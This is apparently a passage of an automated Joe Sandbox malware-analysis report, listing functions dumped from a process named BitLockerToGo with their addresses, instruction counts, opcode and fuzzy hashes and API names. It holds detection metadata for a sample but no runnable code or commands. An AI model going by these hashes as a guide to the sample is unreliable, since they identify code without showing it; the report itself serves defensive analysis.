                                                                                                                                                          • Instruction ID: b68473375da167b7d6d783a6b3ba9ae9610a0e350895a0fd76a6b09c1235c93c
                                                                                                                                                          • Opcode Fuzzy Hash: 1bb2d12d55d91590ae2f05de939e756a01c1a7b285e88c322bc998e669b99299
                                                                                                                                                          • Instruction Fuzzy Hash: EFB12772B083208BE710DB28EC8272B77E1EF91314F49842EE9C597381E67C9D45C79A
                                                                                                                                                          Function 0040A0E0 Relevance: .4, Instructions: 399COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ceace48b0476e5dcae2d4e504807f26e25d9ec6e3970cce08f74a26354bb8615
                                                                                                                                                          • Instruction ID: 851590f2759d5631eca1c4ef178e26ce132e17415f4db8d92293acb8ec97bfd9
                                                                                                                                                          • Opcode Fuzzy Hash: ceace48b0476e5dcae2d4e504807f26e25d9ec6e3970cce08f74a26354bb8615
                                                                                                                                                          • Instruction Fuzzy Hash: F0E17935108341DFC720DF29C880A2BBBE1BF99300F44892DE5D597792E379E958CB96
                                                                                                                                                          Function 0042C2EE Relevance: .4, Instructions: 399COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ed62aef78ed4e95b2784a88a58c2f713839f95a97c0321b1708bd9825a58841f
                                                                                                                                                          • Instruction ID: a99e8120d2306475a62ff7c1a515e18490fc8aeeca6a4c6c587463819ab114e4
                                                                                                                                                          • Opcode Fuzzy Hash: ed62aef78ed4e95b2784a88a58c2f713839f95a97c0321b1708bd9825a58841f
                                                                                                                                                          • Instruction Fuzzy Hash: 50D12631A08391CFD3148F38989032E7BA2AF87321F5986BDE5A54B3E2D7349D49CB45
                                                                                                                                                          Function 00415497 Relevance: .4, Instructions: 355COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 43275392ab3a945557cf27c7762ef4be454c1a039103d5c3350fc80ef9ce505b
                                                                                                                                                          • Instruction ID: 17d26e273b96daff5aecdaafb5e11adc2834f414c9a0bf8475ac287174c0c247
                                                                                                                                                          • Opcode Fuzzy Hash: 43275392ab3a945557cf27c7762ef4be454c1a039103d5c3350fc80ef9ce505b
                                                                                                                                                          • Instruction Fuzzy Hash: 1DE1A2B5608B408FD3259B38C4553EABBE1AF95314F484E2ED4EF83382E738A545CB16
                                                                                                                                                          Function 00444870 Relevance: .3, Instructions: 346COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6d173c59736fba65388d8d8e9d88212dc61a3a9e1cc6dddfb89a8477f0bc0689
                                                                                                                                                          • Instruction ID: c4ff76c885949de9c5be3820ff6930e1d02da41f135992f015c5639a9b793640
                                                                                                                                                          • Opcode Fuzzy Hash: 6d173c59736fba65388d8d8e9d88212dc61a3a9e1cc6dddfb89a8477f0bc0689
                                                                                                                                                          • Instruction Fuzzy Hash: 56B12572A483514BF3149F69DC8172BB7D9EBC0314F08893EF99597391E678EC04879A
                                                                                                                                                          Function 0040AC60 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 70f937f4ce0cdf4e4e074d3a04bdb773745eb66b28040d02f3175f22e09d0d6c
                                                                                                                                                          • Instruction ID: 3639e434280cd56b61adec5f13962f349eef754b605caa3863d066f625ed5814
                                                                                                                                                          • Opcode Fuzzy Hash: 70f937f4ce0cdf4e4e074d3a04bdb773745eb66b28040d02f3175f22e09d0d6c
                                                                                                                                                          • Instruction Fuzzy Hash: 05C15BB29587418FC360CF28DC86BABB7E1FF85318F08492DD1D9D6242E778A155CB4A
                                                                                                                                                          Function 00446990 Relevance: .3, Instructions: 254COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 2cb9d12f7b13cf3f387cc2a0ebcd73a3c28dc89454ce063ed32039c2e1b03eed
                                                                                                                                                          • Instruction ID: be49bcc854f87b32765507b99d06053b96a43072d7a0d1843785837ab99925f0
                                                                                                                                                          • Opcode Fuzzy Hash: 2cb9d12f7b13cf3f387cc2a0ebcd73a3c28dc89454ce063ed32039c2e1b03eed
                                                                                                                                                          • Instruction Fuzzy Hash: 4D7176316043019BE724AF19C85062FB3E2EFD6750F16C42DE9819B365EB74E951C74A
                                                                                                                                                          Function 0041900F Relevance: .2, Instructions: 228COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 22e5005b7c77f0141c2af3b057fa1e432f24363bf0741f73e464d03b0b7ac28c
                                                                                                                                                          • Instruction ID: 5f22aee186c57418e4bf9bd01419c4bbce62237ae60a6fb8f7db6fef493464f6
                                                                                                                                                          • Opcode Fuzzy Hash: 22e5005b7c77f0141c2af3b057fa1e432f24363bf0741f73e464d03b0b7ac28c
                                                                                                                                                          • Instruction Fuzzy Hash: 4591E776614B808FD3318A38C8953D6BFE29B96324F188E7DC5EA873C2D679A445CB11
                                                                                                                                                          Function 004471F0 Relevance: .2, Instructions: 228COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a7e2ec72d853d2bfbfbfdb319afccc47f24a5273531eda53e4d4303f23a87cc4
                                                                                                                                                          • Instruction ID: 209e60cf7bf80287382b4f000f536cbd3f5e28b1c9feec9c4baa3c7f166c2617
                                                                                                                                                          • Opcode Fuzzy Hash: a7e2ec72d853d2bfbfbfdb319afccc47f24a5273531eda53e4d4303f23a87cc4
                                                                                                                                                          • Instruction Fuzzy Hash: 7E6114316083009BE7289F28C881A3BB7A2FFC5714F14896DF986873A2DB74DC06C795
                                                                                                                                                          Function 004352D0 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a400451c7af91138eb5eb73043359c27a26ddc6c422a615c787ea793587c2b0c
                                                                                                                                                          • Instruction ID: 8d72d14098f3c7d60832fc420af098260fe1c693be79538561085adcbea233ba
                                                                                                                                                          • Opcode Fuzzy Hash: a400451c7af91138eb5eb73043359c27a26ddc6c422a615c787ea793587c2b0c
                                                                                                                                                          • Instruction Fuzzy Hash: 6951F937619AD187C7288A3C5C102AEAB531BEB370F3E9367D9B54B3D1C9298C439356
                                                                                                                                                          Function 0042D327 Relevance: .2, Instructions: 190COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cc07671281396172990d871ca8447c485d9c7591983b8edd82a9f2cc7189f465
                                                                                                                                                          • Instruction ID: 17f562a13d4ee502afd020b4be555a82365a40c2b5f5fc5c6809e289e13f0443
                                                                                                                                                          • Opcode Fuzzy Hash: cc07671281396172990d871ca8447c485d9c7591983b8edd82a9f2cc7189f465
                                                                                                                                                          • Instruction Fuzzy Hash: 1A51E4B2E147254BC718DE2CE89122EB2D2ABC4305F99863DDC5A9B381EB34AC10C7C5
                                                                                                                                                          Function 0043B970 Relevance: .2, Instructions: 189COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c8d23429eb03083d8ad6b52875692930ce62021611f4812b27f6aac4f420f026
                                                                                                                                                          • Instruction ID: fdc43c70927a67208ddd989978fb5724d702d6cb444deef10df8194624b1ef05
                                                                                                                                                          • Opcode Fuzzy Hash: c8d23429eb03083d8ad6b52875692930ce62021611f4812b27f6aac4f420f026
                                                                                                                                                          • Instruction Fuzzy Hash: B8515DB15087548FE314DF29D89435BBBE1FB88318F044A2EE5D987391E779DA088F86
                                                                                                                                                          Function 004056F0 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 129386c023a275c392eace29f07c6dc21b770b507e8fb9bdc0246277421e993d
                                                                                                                                                          • Instruction ID: 23da2868c5d33b026c2268501c948a56693228b541898265fc2801742d09375c
                                                                                                                                                          • Opcode Fuzzy Hash: 129386c023a275c392eace29f07c6dc21b770b507e8fb9bdc0246277421e993d
                                                                                                                                                          • Instruction Fuzzy Hash: 05519075A046009FC714EF18C480917B7A1FF89324F25867DE859AB392D735EC52CF9A
                                                                                                                                                          Function 00440AA0 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cb5dcd08d027ad22613818756b6d5467b2c669c5d5a0bcf9de2727fa8300f91d
                                                                                                                                                          • Instruction ID: 1deebda00461899859433273c51af892f917149bb424a7551e937cd11b42b505
                                                                                                                                                          • Opcode Fuzzy Hash: cb5dcd08d027ad22613818756b6d5467b2c669c5d5a0bcf9de2727fa8300f91d
                                                                                                                                                          • Instruction Fuzzy Hash: 66415830604340CBE7248F54D880A2BB3E6EB85709F14892EE6D58B346D73DED61CB5E
                                                                                                                                                          Function 00411100 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1ca9322d05551d697019e2ef725af6820d14189e120fc89b9010075c7ee9691e
                                                                                                                                                          • Instruction ID: b84a188268feb3bc4bb66fda38f13ad2e4dc3c8775cc23eceab36ed01cc849ae
                                                                                                                                                          • Opcode Fuzzy Hash: 1ca9322d05551d697019e2ef725af6820d14189e120fc89b9010075c7ee9691e
                                                                                                                                                          • Instruction Fuzzy Hash: 574124727083A01FD318CE3A889016BBAD2ABC6610F19C63EF1A6C7790E6798945E711
                                                                                                                                                          Function 004405F0 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f8c059e43be4a535d708b4a621a60a8cc57f347d2bb58e3ec555c5304d794362
                                                                                                                                                          • Instruction ID: 42f62d7ba04c00c2ef4d095ee132e04ae57741186284adf9d5084889062b7f5f
                                                                                                                                                          • Opcode Fuzzy Hash: f8c059e43be4a535d708b4a621a60a8cc57f347d2bb58e3ec555c5304d794362
                                                                                                                                                          • Instruction Fuzzy Hash: C53105316493108FE3108E19C8817ABB7E4EBC6714F148A2EE5D49B382D37D9E568F96
                                                                                                                                                          Function 0041E4E0 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cef309a830c05eef06d7282551732a2f9d35485cb54e6e96c37cac67246454bc
                                                                                                                                                          • Instruction ID: f0df7fd79487421271ee37c45451049943c32acc6194f4433201761664d86dc0
                                                                                                                                                          • Opcode Fuzzy Hash: cef309a830c05eef06d7282551732a2f9d35485cb54e6e96c37cac67246454bc
                                                                                                                                                          • Instruction Fuzzy Hash: 1B210BF69082086BC7209FA9DC847A677D5DB66318F05053AEC54C7391F679D848C399
                                                                                                                                                          Function 0040E244 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0d7843fea77be65ec2dc5be9c5aabad1ea28764278aaa30f8467571588f55f26
                                                                                                                                                          • Instruction ID: 7a50a9f99fe509ed5abd3d1444807cfdba8fa8f5c03ead7d3c5201709936c7ac
                                                                                                                                                          • Opcode Fuzzy Hash: 0d7843fea77be65ec2dc5be9c5aabad1ea28764278aaa30f8467571588f55f26
                                                                                                                                                          • Instruction Fuzzy Hash: 223174B5860601DFEB02AF11FC02A283A72F711747B54443AED1656337EB3795385B9D
                                                                                                                                                          Function 00440750 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: d54bd6890c34b4c4784bed1e370f35d3f2d488265aca28555433554b9eb81ed0
                                                                                                                                                          • Instruction ID: a6bc32531b65bb109f1d29ca75e18ad22b5e0675f30201dcfdcdce88cf59f270
                                                                                                                                                          • Opcode Fuzzy Hash: d54bd6890c34b4c4784bed1e370f35d3f2d488265aca28555433554b9eb81ed0
                                                                                                                                                          • Instruction Fuzzy Hash: D701893174630447E3205E15DC8063FB366EBC2B06F28886ED5C44B30AC23D9D618BEB
                                                                                                                                                          Function 004398F0 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                          • Instruction ID: c3389a028b57d2c6f8660b0fd5182bfb16cec91258370e18d2e670114cd09b91
                                                                                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                          • Instruction Fuzzy Hash: 70110633A051D00EC3128D3C8400665BFA30E97234F29939EE4F99B3E6D6268D8A8359
                                                                                                                                                          Function 0042F2F0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cba8d5414123abd0156be537598fcc8b68246052cc6136f9088918b4a5c76c82
                                                                                                                                                          • Instruction ID: 3639acd0a04a9bc188f12e7d307e905716d7a751ac8ea85a50f11596bdf3e31f
                                                                                                                                                          • Opcode Fuzzy Hash: cba8d5414123abd0156be537598fcc8b68246052cc6136f9088918b4a5c76c82
                                                                                                                                                          • Instruction Fuzzy Hash: 2C0192F570031297D620DE52A4C072BA2B96B95708F98013ED80957341DB79EC0D86A9
                                                                                                                                                          Function 00406B90 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7b1c3a3e65a7531f3c18b00ff559a6976501e97bfaf79854a4399e9df32d9b59
                                                                                                                                                          • Instruction ID: aba9a890871ce0331996ed83f4c46464f4e9697871ff0bd83b9eaa27a51a4113
                                                                                                                                                          • Opcode Fuzzy Hash: 7b1c3a3e65a7531f3c18b00ff559a6976501e97bfaf79854a4399e9df32d9b59
                                                                                                                                                          • Instruction Fuzzy Hash: 27F02B3A7152250FA310DEBE98C0427B3A5E7CA314B09453DFE41D3351DC35F801A1E4
                                                                                                                                                          Function 0042B8F0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 10b6db0e46a21d2e7c95a5163266be61d3d0ca80e751293dbc9e31aa5515ccad
                                                                                                                                                          • Instruction ID: 8ea249ba1437f134b8596e69d5de43ad9f17c333b4491c2c135bf4b8cae9b9ba
                                                                                                                                                          • Opcode Fuzzy Hash: 10b6db0e46a21d2e7c95a5163266be61d3d0ca80e751293dbc9e31aa5515ccad
                                                                                                                                                          • Instruction Fuzzy Hash: D3015EB05093499FD300AF26C49676BBFE4AB82754F60096CF2D147285D3B98449CB8A
                                                                                                                                                          Function 0041E180 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 952e4f92b8fc19abdc68d085b36828d10f4bdda9abd9578d9f95617d4d910749
                                                                                                                                                          • Instruction ID: 7f74259161208d30b41bd763158258df03a5843299c7edaf5be0184ac69567f3
                                                                                                                                                          • Opcode Fuzzy Hash: 952e4f92b8fc19abdc68d085b36828d10f4bdda9abd9578d9f95617d4d910749
                                                                                                                                                          • Instruction Fuzzy Hash: AFF027B5A0461037DB2289469C80BB7BB9CCB8B754F090416EC4893242D1755880C3E9
                                                                                                                                                          Function 0043EE00 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                          • Instruction ID: 550cd910d2961c47074019fb635e8b549c9fc5694d696d1181d167e8f5978995
                                                                                                                                                          • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                          • Instruction Fuzzy Hash: 29D0A521549321465B748D1BD401577F7F0E9C7711F45655FF581D3284D334DC41C16D
                                                                                                                                                          Function 0042C913 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2fa2b98601e58dc3d81f741fc39a7be88994b483617a708e34bd27471077b29d
                                                                                                                                                          • Instruction ID: 1812827e6deaf737203092219cf967eaadf58b01afd92c358322bf0d6786a7c2
                                                                                                                                                          • Opcode Fuzzy Hash: 2fa2b98601e58dc3d81f741fc39a7be88994b483617a708e34bd27471077b29d
                                                                                                                                                          • Instruction Fuzzy Hash: 3BB092B9C02411EAD0112B133C424AEB026291324AF042136E80633242A72AD21A88AF
                                                                                                                                                          Function 0042CBDC Relevance: .0, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4775fa5ea7ff0fce0ae602f6a43efa967e3d986497edf7c849ece820998419df
                                                                                                                                                          • Instruction ID: 6b46632e3a7cf9097a448195f2ceeb7f5888bd1813a4f5f861f456501a0f7b20
                                                                                                                                                          • Opcode Fuzzy Hash: 4775fa5ea7ff0fce0ae602f6a43efa967e3d986497edf7c849ece820998419df
                                                                                                                                                          • Instruction Fuzzy Hash: 4CB012B8E44101E3C5007F333C82039A03D1617309F4035BD600733043AE3DD00C442D
                                                                                                                                                          Function 004370C0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 144COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                          • String ID: &~C$'wC$*xC$J~C$m|C$xzC${C
                                                                                                                                                          • API String ID: 4116985748-588620804
                                                                                                                                                          • Opcode ID: 764eab8b42627bb81cdfd695d464b7b564659876efbf52c05c039a8eca4bf054
                                                                                                                                                          • Instruction ID: 66dada05c327a1c61d24dc321b899d0899824898c12b3fe3090271d05fad01cc
                                                                                                                                                          • Opcode Fuzzy Hash: 764eab8b42627bb81cdfd695d464b7b564659876efbf52c05c039a8eca4bf054
                                                                                                                                                          • Instruction Fuzzy Hash: 4FA14CB44093888AF771DF54D5897CBBBE0BB85348F20892ED5888B650C7F9548DCF9A
